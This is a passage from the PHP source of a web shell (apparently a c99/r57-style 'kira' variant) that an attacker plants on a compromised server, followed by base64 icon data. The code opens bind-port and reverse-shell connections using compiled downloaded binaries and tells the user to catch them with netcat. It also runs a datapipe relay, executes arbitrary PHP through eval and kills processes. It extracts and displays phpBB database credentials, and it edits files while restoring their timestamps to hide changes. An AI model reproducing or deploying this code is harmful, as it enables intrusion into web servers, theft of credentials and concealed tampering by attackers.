2150 if (empty($v)) {echo "Unknown file!<br>";}
2151 elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2152 else
2153 {
2154 $w = explode(".",$bind["src"]);
2155 $ext = $w[count($w)-1];
2156 unset($w[count($w)-1]);
2157 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2158 $binpath = $tmpdir.join(".",$w).rand(0,999);
2159 if ($ext == "pl") {$binpath = $srcpath;}
2160 @unlink($srcpath);
2161 $fp = fopen($srcpath,"ab+");
2162 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2163 elseif (!$data = k1r4getsource($bind["src"])) {echo "Can't download sources!";}
2164 else
2165 {
2166 fwrite($fp,$data,strlen($data));
2167 fclose($fp);
2168 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2169 $v[1] = str_replace("%path",$binpath,$v[1]);
2170 $v[1] = str_replace("%port",$bind["port"],$v[1]);
2171 $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
2172 $v[1] = str_replace("//","/",$v[1]);
2173 $retbind = myshellexec($v[1]." > /dev/null &");
2174 sleep(5);
2175 $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
2176 if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
2177 else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
2178 }
2179 echo "<br>";
2180 }
2181 }
2182 if (!empty($bcsubmit))
2183 {
2184 echo "<b>Result of back connection:</b><br>";
2185 $v = $bcsrcs[$bc["src"]];
2186 if (empty($v)) {echo "Unknown file!<br>";}
2187 else
2188 {
2189 $w = explode(".",$bc["src"]);
2190 $ext = $w[count($w)-1];
2191 unset($w[count($w)-1]);
2192 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2193 $binpath = $tmpdir.join(".",$w).rand(0,999);
2194 if ($ext == "pl") {$binpath = $srcpath;}
2195 @unlink($srcpath);
2196 $fp = fopen($srcpath,"ab+");
2197 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2198 elseif (!$data = k1r4getsource($bc["src"])) {echo "Can't download sources!";}
2199 else
2200 {
2201 fwrite($fp,$data,strlen($data));
2202 fclose($fp);
2203 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2204 $v[1] = str_replace("%path",$binpath,$v[1]);
2205 $v[1] = str_replace("%host",$bc["host"],$v[1]);
2206 $v[1] = str_replace("%port",$bc["port"],$v[1]);
2207 $v[1] = str_replace("//","/",$v[1]);
2208 $retbind = myshellexec($v[1]." > /dev/null &");
2209 echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
2210 }
2211 }
2212 }
2213 if (!empty($dpsubmit))
2214 {
2215 echo "<b>Result of datapipe-running:</b><br>";
2216 $v = $dpsrcs[$datapipe["src"]];
2217 if (empty($v)) {echo "Unknown file!<br>";}
2218 elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
2219 else
2220 {
2221 $srcpath = $tmpdir.$datapipe["src"];
2222 $w = explode(".",$datapipe["src"]);
2223 $ext = $w[count($w)-1];
2224 unset($w[count($w)-1]);
2225 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
2226 $binpath = $tmpdir.join(".",$w).rand(0,999);
2227 if ($ext == "pl") {$binpath = $srcpath;}
2228 @unlink($srcpath);
2229 $fp = fopen($srcpath,"ab+");
2230 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
2231 elseif (!$data = k1r4getsource($datapipe["src"])) {echo "Can't download sources!";}
2232 else
2233 {
2234 fwrite($fp,$data,strlen($data));
2235 fclose($fp);
2236 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
2237 list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
2238 $v[1] = str_replace("%path",$binpath,$v[1]);
2239 $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
2240 $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
2241 $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
2242 $v[1] = str_replace("//","/",$v[1]);
2243 $retbind = myshellexec($v[1]." > /dev/null &");
2244 sleep(5);
2245 $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
2246 if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
2247 else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
2248 }
2249 echo "<br>";
2250 }
2251 }
2252 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
2253 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2254 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
2255<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
2256foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2257?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
2258Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
2259<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
2260foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
2261?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
2262}
2263if ($act == "processes")
2264{
2265 echo "<b>Processes:</b><br>";
2266 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
2267 else {$handler = "tasklist";}
2268 $ret = myshellexec($handler);
2269 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
2270 else
2271 {
2272 if (empty($processes_sort)) {$processes_sort = $sort_default;}
2273 $parsesort = parsesort($processes_sort);
2274 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2275 $k = $parsesort[0];
2276 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2277 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2278 $ret = htmlspecialchars($ret);
2279 if (!$win)
2280 {
2281 if ($pid)
2282 {
2283 if (is_null($sig)) {$sig = 9;}
2284 echo "Sending signal ".$sig." to #".$pid."... ";
2285 if (posix_kill($pid,$sig)) {echo "OK.";}
2286 else {echo "ERROR.";}
2287 }
2288 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
2289 $stack = explode("\n",$ret);
2290 $head = explode(" ",$stack[0]);
2291 unset($stack[0]);
2292 for($i=0;$i<count($head);$i++)
2293 {
2294 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
2295 }
2296 $prcs = array();
2297 foreach ($stack as $line)
2298 {
2299 if (!empty($line))
2300{
2301 echo "<tr>";
2302 $line = explode(" ",$line);
2303 $line[10] = join(" ",array_slice($line,10));
2304 $line = array_slice($line,0,11);
2305 if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
2306 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2307 $prcs[] = $line;
2308 echo "</tr>";
2309 }
2310 }
2311 }
2312 else
2313 {
2314 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2315 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2316 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2317 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2318 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2319 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2320 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2321 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2322 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2323 while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
2324 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
2325 $ret = convert_cyr_string($ret,"d","w");
2326 $stack = explode("\n",$ret);
2327 unset($stack[0],$stack[2]);
2328 $stack = array_values($stack);
2329 $head = explode("",$stack[0]);
2330 $head[1] = explode(" ",$head[1]);
2331 $head[1] = $head[1][0];
2332 $stack = array_slice($stack,1);
2333 unset($head[2]);
2334 $head = array_values($head);
2335 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2336 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
2337 if ($k > count($head)) {$k = count($head)-1;}
2338 for($i=0;$i<count($head);$i++)
2339 {
2340 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
2341 }
2342 $prcs = array();
2343 foreach ($stack as $line)
2344 {
2345 if (!empty($line))
2346 {
2347 echo "<tr>";
2348 $line = explode("",$line);
2349 $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
2350 $line[2] = intval(str_replace(" ","",$line[2]))*1024;
2351 $prcs[] = $line;
2352 echo "</tr>";
2353 }
2354 }
2355 }
2356 $head[$k] = "<b>".$head[$k]."</b>".$y;
2357 $v = $processes_sort[0];
2358 usort($prcs,"tabsort");
2359 if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
2360 $tab = array();
2361 $tab[] = $head;
2362 $tab = array_merge($tab,$prcs);
2363 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
2364 foreach($tab as $i=>$k)
2365 {
2366 echo "<tr>";
2367 foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
2368 echo "</tr>";
2369 }
2370 echo "</table>";
2371 }
2372}
2373if ($act == "eval")
2374{
2375 if (!empty($eval))
2376 {
2377 echo "<b>Result of execution this PHP-code</b>:<br>";
2378 $tmp = ob_get_contents();
2379 $olddir = realpath(".");
2380 @chdir($d);
2381 if ($tmp)
2382 {
2383 ob_clean();
2384 eval($eval);
2385 $ret = ob_get_contents();
2386 $ret = convert_cyr_string($ret,"d","w");
2387 ob_clean();
2388 echo $tmp;
2389 if ($eval_txt)
2390 {
2391 $rows = count(explode("\r\n",$ret))+1;
2392 if ($rows < 10) {$rows = 10;}
2393 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2394 }
2395 else {echo $ret."<br>";}
2396 }
2397 else
2398 {
2399 if ($eval_txt)
2400 {
2401 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
2402 eval($eval);
2403 echo "</textarea>";
2404 }
2405 else {echo $ret;}
2406 }
2407 @chdir($olddir);
2408 }
2409 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2410 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2411}
2412if ($act == "f")
2413{
2414 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
2415 {
2416 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2417 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2418 }
2419 else
2420 {
2421 $r = @file_get_contents($d.$f);
2422 $ext = explode(".",$f);
2423 $c = count($ext)-1;
2424 $ext = $ext[$c];
2425 $ext = strtolower($ext);
2426 $rft = "";
2427 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2428 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2429 if (empty($ft)) {$ft = $rft;}
2430 $arr = array(
2431 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2432 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2433 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2434 array("Code","code"),
2435 array("Session","phpsess"),
2436 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2437 array("SDB","sdb"),
2438 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2439 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2440 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2441 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2442 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2443 );
2444 echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2445 foreach($arr as $t)
2446 {
2447 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2448 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2449 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2450 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2451 }
2452 echo "<hr size=\"1\" noshade>";
2453 if ($ft == "info")
2454 {
2455 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2456 if (!$win)
2457 {
2458 echo "<tr><td><b>Owner/Group</b></td><td> ";
2459 $ow = posix_getpwuid(fileowner($d.$f));
2460 $gr = posix_getgrgid(filegroup($d.$f));
2461 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2462 }
2463 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
2464 $fi = fopen($d.$f,"rb");
2465 if ($fi)
2466 {
2467 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2468 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2469 $n = 0;
2470 $a0 = "00000000<br>";
2471 $a1 = "";
2472 $a2 = "";
2473 for ($i=0; $i<strlen($str); $i++)
2474 {
2475 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2476 switch (ord($str[$i]))
2477 {
2478 case 0: $a2 .= "<font>0</font>"; break;
2479 case 32:
2480 case 10:
2481 case 13: $a2 .= "&nbsp;"; break;
2482 default: $a2 .= htmlspecialchars($str[$i]);
2483 }
2484 $n++;
2485 if ($n == $hexdump_rows)
2486 {
2487 $n = 0;
2488 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2489 $a1 .= "<br>";
2490 $a2 .= "<br>";
2491 }
2492 }
2493 //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
2494 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
2495 }
2496 $encoded = "";
2497 if ($base64 == 1)
2498 {
2499 echo "<b>Base64 Encode</b><br>";
2500 $encoded = base64_encode(file_get_contents($d.$f));
2501 }
2502 elseif($base64 == 2)
2503 {
2504 echo "<b>Base64 Encode + Chunk</b><br>";
2505 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2506 }
2507 elseif($base64 == 3)
2508 {
2509 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2510 $encoded = base64_encode(file_get_contents($d.$f));
2511 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2512 }
2513 elseif($base64 == 4)
2514 {
2515 $text = file_get_contents($d.$f);
2516 $encoded = base64_decode($text);
2517 echo "<b>Base64 Decode";
2518 if (base64_encode($encoded) != $text) {echo " (failed)";}
2519 echo "</b><br>";
2520 }
2521 if (!empty($encoded))
2522 {
2523 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2524 }
2525 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2526<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
2527<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
2528<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
2529<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
2530<P>";
2531 }
2532 elseif ($ft == "html")
2533 {
2534 if ($white) {@ob_clean();}
2535 echo $r;
2536 if ($white) {k1r4exit();}
2537 }
2538 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2539 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2540 elseif ($ft == "phpsess")
2541 {
2542 echo "<pre>";
2543 $v = explode("|",$r);
2544 echo $v[0]."<br>";
2545 var_dump(unserialize($v[1]));
2546 echo "</pre>";
2547 }
2548 elseif ($ft == "exe")
2549 {
2550 $ext = explode(".",$f);
2551 $c = count($ext)-1;
2552 $ext = $ext[$c];
2553 $ext = strtolower($ext);
2554 $rft = "";
2555 foreach($exeftypes as $k=>$v)
2556 {
2557 if (in_array($ext,$v)) {$rft = $k; break;}
2558 }
2559 $cmd = str_replace("%f%",$f,$rft);
2560 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2561 }
2562 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2563 elseif ($ft == "code")
2564 {
2565 if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
2566 {
2567 $arr = explode("\n",$r);
2568 if (count($arr == 18))
2569 {
2570 include($d.$f);
2571 echo "<b>phpBB configuration is detected in this file!<br>";
2572 if ($dbms == "mysql4") {$dbms = "mysql";}
2573 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2574 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";}
2575 echo "Parameters for manual connect:<br>";
2576 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2577 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2578 echo "</b><hr size=\"1\" noshade>";
2579 }
2580 }
2581 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
2582 if (!empty($white)) {@ob_clean();}
2583 highlight_file($d.$f);
2584 if (!empty($white)) {k1r4exit();}
2585 echo "</div>";
2586 }
2587 elseif ($ft == "download")
2588 {
2589 @ob_clean();
2590 header("Content-type: application/octet-stream");
2591 header("Content-length: ".filesize($d.$f));
2592 header("Content-disposition: attachment; filename=\"".$f."\";");
2593 echo $r;
2594 exit;
2595 }
2596 elseif ($ft == "notepad")
2597 {
2598 @ob_clean();
2599 header("Content-type: text/plain");
2600 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2601 echo($r);
2602 exit;
2603 }
2604 elseif ($ft == "img")
2605 {
2606 $inf = getimagesize($d.$f);
2607 if (!$white)
2608 {
2609 if (empty($imgsize)) {$imgsize = 20;}
2610 $width = $inf[0]/100*$imgsize;
2611 $height = $inf[1]/100*$imgsize;
2612 echo "<center><b>Size:</b>&nbsp;";
2613 $sizes = array("100","50","20");
2614 foreach ($sizes as $v)
2615 {
2616 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2617 if ($imgsize != $v ) {echo $v;}
2618 else {echo "<u>".$v."</u>";}
2619 echo "</a>&nbsp;&nbsp;&nbsp;";
2620 }
2621 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2622 }
2623 else
2624 {
2625 @ob_clean();
2626 $ext = explode($f,".");
2627 $ext = $ext[count($ext)-1];
2628 header("Content-type: ".$inf["mime"]);
2629 readfile($d.$f);
2630 exit;
2631 }
2632 }
2633 elseif ($ft == "edit")
2634 {
2635 if (!empty($submit))
2636 {
2637 if ($filestealth) {$stat = stat($d.$f);}
2638 $fp = fopen($d.$f,"w");
2639 if (!$fp) {echo "<b>Can't write to file!</b>";}
2640 else
2641 {
2642 echo "<b>Saved!</b>";
2643 fwrite($fp,$edit_text);
2644 fclose($fp);
2645 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2646 $r = $edit_text;
2647 }
2648 }
2649 $rows = count(explode("\r\n",$r));
2650 if ($rows < 10) {$rows = 10;}
2651 if ($rows > 30) {$rows = 30;}
2652 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2653 }
2654 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2655 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
2656 }
2657}
2658}
2659else
2660{
2661 @ob_clean();
2662 $images = array(
2663"arrow_ltr"=>
2664"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2665"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2666"back"=>
2667"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2668"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2669"Wg0JADs=",
2670"buffer"=>
2671"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2672"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2673"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2674"change"=>
2675"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2676"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2677"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2678"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2679"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2680"zMshADs=",
2681"delete"=>
2682"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2683"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2684"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2685"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2686"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2687"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
